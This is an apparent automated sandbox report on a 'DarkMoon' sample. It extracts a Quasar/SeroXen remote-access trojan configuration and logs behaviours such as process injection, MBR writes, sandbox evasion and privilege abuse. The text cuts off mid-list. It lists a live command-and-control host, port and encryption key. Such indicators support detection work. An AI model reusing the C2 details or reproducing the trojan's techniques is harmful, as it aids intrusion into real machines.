Analysis
-
max time kernel
300s -
max time network
296s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
02-06-2024 15:12
Static task
static1
Behavioral task
behavioral1
Sample
DarkMoon_Gen_1-3/lib/main.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
DarkMoon_Gen_1-3/lib/uni.bat
Resource
win7-20240220-en
Behavioral task
behavioral3
Sample
DarkMoon_Gen_1-3/lib/uni.bat
Resource
win10v2004-20240426-en
Behavioral task
behavioral4
Sample
DarkMoon_Gen_1-3/starter.bat
Resource
win7-20240508-en
Behavioral task
behavioral5
Sample
DarkMoon_Gen_1-3/starter.bat
Resource
win10v2004-20240426-en
General
-
Target
DarkMoon_Gen_1-3/starter.bat
-
Size
51B
-
MD5
abc778ba27885c72f364ad89b1306862
-
SHA1
2d4bfe8e2de4390109e8fa786ad47ec68daeaffe
-
SHA256
97c5438395ba799a673564195db730de8d9742a7a141566fa7c9075c46e3a039
-
SHA512
65a9bcdb3493526dd0b340aacabd30cd2e577a03cac920341e7be041e8de133ced0ab45c14a2509fbbd6f2451ac3ef1f5d520328d44f06aa4af6bfb122991f8f
Malware Config
Extracted
quasar
1.0.0.0
v2.2.6 | SeroXen
seroooooxeen.chickenkiller.com:5059
f953c0af-702a-46b5-ad07-d900b11c5cd9
-
encryption_key
458790DC6E62EEB3043B4566BF95CDAF711F1EC0
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
3000
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral5/memory/1064-58-0x0000026D7B8D0000-0x0000026D7C09A000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5344 created 3592 5344 WerFault.exe svchost.exe PID 4824 created 4200 4824 WerFault.exe dllhost.exe PID 5608 created 4576 5608 WerFault.exe dllhost.exe PID 6076 created 4932 6076 WerFault.exe dllhost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Processes:
uni.bat.exe$sxr-powershell.exesvchost.exedescription pid process target process PID 3924 created 616 3924 uni.bat.exe winlogon.exe PID 1064 created 616 1064 $sxr-powershell.exe winlogon.exe PID 1064 created 616 1064 $sxr-powershell.exe winlogon.exe PID 5164 created 3592 5164 svchost.exe svchost.exe PID 3924 created 616 3924 uni.bat.exe winlogon.exe PID 1064 created 616 1064 $sxr-powershell.exe winlogon.exe PID 1064 created 616 1064 $sxr-powershell.exe winlogon.exe PID 5164 created 4200 5164 svchost.exe dllhost.exe PID 1064 created 616 1064 $sxr-powershell.exe winlogon.exe PID 5164 created 4576 5164 svchost.exe dllhost.exe PID 1064 created 616 1064 $sxr-powershell.exe winlogon.exe PID 5164 created 4932 5164 svchost.exe dllhost.exe PID 1064 created 616 1064 $sxr-powershell.exe winlogon.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
$sxr-mshta.exeuni.bat.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation $sxr-mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation uni.bat.exe -
Executes dropped EXE 5 IoCs
Processes:
uni.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe$sxr-powershell.exepid process 3924 uni.bat.exe 3156 $sxr-mshta.exe 668 $sxr-cmd.exe 1064 $sxr-powershell.exe 4712 $sxr-powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
main.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" main.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
svchost.exedescription ioc process File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\W: svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
wmiprvse.exedescription ioc process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
Drops file in System32 directory 12 IoCs
Processes:
svchost.exesvchost.exeOfficeClickToRun.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 18 IoCs
Processes:
uni.bat.exe$sxr-powershell.exedescription pid process target process PID 3924 set thread context of 2888 3924 uni.bat.exe dllhost.exe PID 3924 set thread context of 4344 3924 uni.bat.exe dllhost.exe PID 1064 set thread context of 3624 1064 $sxr-powershell.exe dllhost.exe PID 1064 set thread context of 2900 1064 $sxr-powershell.exe dllhost.exe PID 1064 set thread context of 4976 1064 $sxr-powershell.exe dllhost.exe PID 1064 set thread context of 3236 1064 $sxr-powershell.exe dllhost.exe PID 3924 set thread context of 6008 3924 uni.bat.exe dllhost.exe PID 3924 set thread context of 4280 3924 uni.bat.exe dllhost.exe PID 1064 set thread context of 4176 1064 $sxr-powershell.exe dllhost.exe PID 1064 set thread context of 5108 1064 $sxr-powershell.exe dllhost.exe PID 1064 set thread context of 2212 1064 $sxr-powershell.exe dllhost.exe PID 1064 set thread context of 4200 1064 $sxr-powershell.exe dllhost.exe PID 1064 set thread context of 4576 1064 $sxr-powershell.exe dllhost.exe PID 1064 set thread context of 5552 1064 $sxr-powershell.exe dllhost.exe PID 1064 set thread context of 3484 1064 $sxr-powershell.exe dllhost.exe PID 1064 set thread context of 4932 1064 $sxr-powershell.exe dllhost.exe PID 1064 set thread context of 3928 1064 $sxr-powershell.exe dllhost.exe PID 1064 set thread context of 3344 1064 $sxr-powershell.exe dllhost.exe -
Drops file in Windows directory 14 IoCs
Processes:
uni.bat.exesvchost.exeWerFault.exedescription ioc process File opened for modification C:\Windows\$sxr-mshta.exe uni.bat.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\$sxr-powershell.exe uni.bat.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb00011.log svchost.exe File created C:\Windows\$sxr-powershell.exe uni.bat.exe File created C:\Windows\$sxr-cmd.exe uni.bat.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File created C:\Windows\$sxr-mshta.exe uni.bat.exe File opened for modification C:\Windows\$sxr-cmd.exe uni.bat.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 3116 4200 WerFault.exe dllhost.exe 5588 4932 WerFault.exe dllhost.exe -
Checks processor information in registry 2 TTPs 14 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exesvchost.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe -
Delays execution with timeout.exe 13 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 2880 timeout.exe 4256 timeout.exe 5740 timeout.exe 4856 timeout.exe 4492 timeout.exe 3160 timeout.exe 5424 timeout.exe 5740 timeout.exe 2524 timeout.exe 5836 timeout.exe 5980 timeout.exe 4568 timeout.exe 3116 timeout.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
wmiprvse.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1284 taskkill.exe -
Modifies data under HKEY_USERS 55 IoCs
Processes:
svchost.exeOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 02 Jun 2024 15:13:51 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={7542D38D-DBE1-4127-BF1A-223C30B21CE9}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1717341231" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe -
Modifies registry class 1 IoCs
Processes:
$sxr-mshta.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe -
Runs ping.exe 1 TTPs 18 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 2120 PING.EXE 2604 PING.EXE 4084 PING.EXE 4808 PING.EXE 4040 PING.EXE 3376 PING.EXE 2348 PING.EXE 3956 PING.EXE 4636 PING.EXE 5908 PING.EXE 2308 PING.EXE 4976 PING.EXE 3124 PING.EXE 3940 PING.EXE 5844 PING.EXE 5896 PING.EXE 4720 PING.EXE 2568 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
uni.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exeWerFault.exesvchost.exepid process 3924 uni.bat.exe 3924 uni.bat.exe 3924 uni.bat.exe 2888 dllhost.exe 2888 dllhost.exe 2888 dllhost.exe 4344 dllhost.exe 4344 dllhost.exe 4344 dllhost.exe 4344 dllhost.exe 2888 dllhost.exe 2888 dllhost.exe 3924 uni.bat.exe 3924 uni.bat.exe 1064 $sxr-powershell.exe 1064 $sxr-powershell.exe 1064 $sxr-powershell.exe 1064 $sxr-powershell.exe 1064 $sxr-powershell.exe 3624 dllhost.exe 3624 dllhost.exe 2900 dllhost.exe 2900 dllhost.exe 2900 dllhost.exe 2900 dllhost.exe 3624 dllhost.exe 3624 dllhost.exe 1064 $sxr-powershell.exe 1064 $sxr-powershell.exe 4712 $sxr-powershell.exe 4712 $sxr-powershell.exe 4712 $sxr-powershell.exe 4712 $sxr-powershell.exe 4712 $sxr-powershell.exe 1064 $sxr-powershell.exe 4976 dllhost.exe 4976 dllhost.exe 4976 dllhost.exe 4976 dllhost.exe 3236 dllhost.exe 3236 dllhost.exe 4976 dllhost.exe 4976 dllhost.exe 4976 dllhost.exe 4976 dllhost.exe 3236 dllhost.exe 3236 dllhost.exe 4976 dllhost.exe 4976 dllhost.exe 3236 dllhost.exe 4340 WerFault.exe 4340 WerFault.exe 4976 dllhost.exe 4976 dllhost.exe 3236 dllhost.exe 4976 dllhost.exe 4976 dllhost.exe 4976 dllhost.exe 4976 dllhost.exe 3236 dllhost.exe 3236 dllhost.exe 5164 svchost.exe 5164 svchost.exe 4976 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
uni.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 3924 uni.bat.exe Token: SeDebugPrivilege 3924 uni.bat.exe Token: SeDebugPrivilege 2888 dllhost.exe Token: SeDebugPrivilege 4344 dllhost.exe Token: SeDebugPrivilege 1064 $sxr-powershell.exe Token: SeDebugPrivilege 1064 $sxr-powershell.exe Token: SeDebugPrivilege 3624 dllhost.exe Token: SeDebugPrivilege 2900 dllhost.exe Token: SeDebugPrivilege 4712 $sxr-powershell.exe Token: SeDebugPrivilege 1064 $sxr-powershell.exe Token: SeDebugPrivilege 4976 dllhost.exe Token: SeDebugPrivilege 3236 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2400 svchost.exe Token: SeIncreaseQuotaPrivilege 2400 svchost.exe Token: SeSecurityPrivilege 2400 svchost.exe Token: SeTakeOwnershipPrivilege 2400 svchost.exe Token: SeLoadDriverPrivilege 2400 svchost.exe Token: SeSystemtimePrivilege 2400 svchost.exe Token: SeBackupPrivilege 2400 svchost.exe Token: SeRestorePrivilege 2400 svchost.exe Token: SeShutdownPrivilege 2400 svchost.exe Token: SeSystemEnvironmentPrivilege 2400 svchost.exe Token: SeUndockPrivilege 2400 svchost.exe Token: SeManageVolumePrivilege 2400 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2400 svchost.exe Token: SeIncreaseQuotaPrivilege 2400 svchost.exe Token: SeSecurityPrivilege 2400 svchost.exe Token: SeTakeOwnershipPrivilege 2400 svchost.exe Token: SeLoadDriverPrivilege 2400 svchost.exe Token: SeSystemtimePrivilege 2400 svchost.exe Token: SeBackupPrivilege 2400 svchost.exe Token: SeRestorePrivilege 2400 svchost.exe Token: SeShutdownPrivilege 2400 svchost.exe Token: SeSystemEnvironmentPrivilege 2400 svchost.exe Token: SeUndockPrivilege 2400 svchost.exe Token: SeManageVolumePrivilege 2400 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2400 svchost.exe Token: SeIncreaseQuotaPrivilege 2400 svchost.exe Token: SeSecurityPrivilege 2400 svchost.exe Token: SeTakeOwnershipPrivilege 2400 svchost.exe Token: SeLoadDriverPrivilege 2400 svchost.exe Token: SeSystemtimePrivilege 2400 svchost.exe Token: SeBackupPrivilege 2400 svchost.exe Token: SeRestorePrivilege 2400 svchost.exe Token: SeShutdownPrivilege 2400 svchost.exe Token: SeSystemEnvironmentPrivilege 2400 svchost.exe Token: SeUndockPrivilege 2400 svchost.exe Token: SeManageVolumePrivilege 2400 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2400 svchost.exe Token: SeIncreaseQuotaPrivilege 2400 svchost.exe Token: SeSecurityPrivilege 2400 svchost.exe Token: SeTakeOwnershipPrivilege 2400 svchost.exe Token: SeLoadDriverPrivilege 2400 svchost.exe Token: SeSystemtimePrivilege 2400 svchost.exe Token: SeBackupPrivilege 2400 svchost.exe Token: SeRestorePrivilege 2400 svchost.exe Token: SeShutdownPrivilege 2400 svchost.exe Token: SeSystemEnvironmentPrivilege 2400 svchost.exe Token: SeUndockPrivilege 2400 svchost.exe Token: SeManageVolumePrivilege 2400 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2400 svchost.exe Token: SeIncreaseQuotaPrivilege 2400 svchost.exe Token: SeSecurityPrivilege 2400 svchost.exe Token: SeTakeOwnershipPrivilege 2400 svchost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
$sxr-powershell.exeConhost.exepid process 1064 $sxr-powershell.exe 1600 Conhost.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3360 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exemain.execmd.execmd.exeuni.bat.exe$sxr-mshta.exe$sxr-cmd.exedescription pid process target process PID 3204 wrote to memory of 2812 3204 cmd.exe cmd.exe PID 3204 wrote to memory of 2812 3204 cmd.exe cmd.exe PID 3204 wrote to memory of 3356 3204 cmd.exe main.exe PID 3204 wrote to memory of 3356 3204 cmd.exe main.exe PID 3356 wrote to memory of 1384 3356 main.exe cmd.exe PID 3356 wrote to memory of 1384 3356 main.exe cmd.exe PID 1384 wrote to memory of 3344 1384 cmd.exe chcp.com PID 1384 wrote to memory of 3344 1384 cmd.exe chcp.com PID 1384 wrote to memory of 2880 1384 cmd.exe timeout.exe PID 1384 wrote to memory of 2880 1384 cmd.exe timeout.exe PID 1384 wrote to memory of 2120 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 2120 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 2604 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 2604 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 2308 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 2308 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 4040 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 4040 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 2568 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 2568 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 3376 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 3376 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 4084 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 4084 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 4976 1384 cmd.exe PING.EXE PID 1384 wrote to memory of 4976 1384 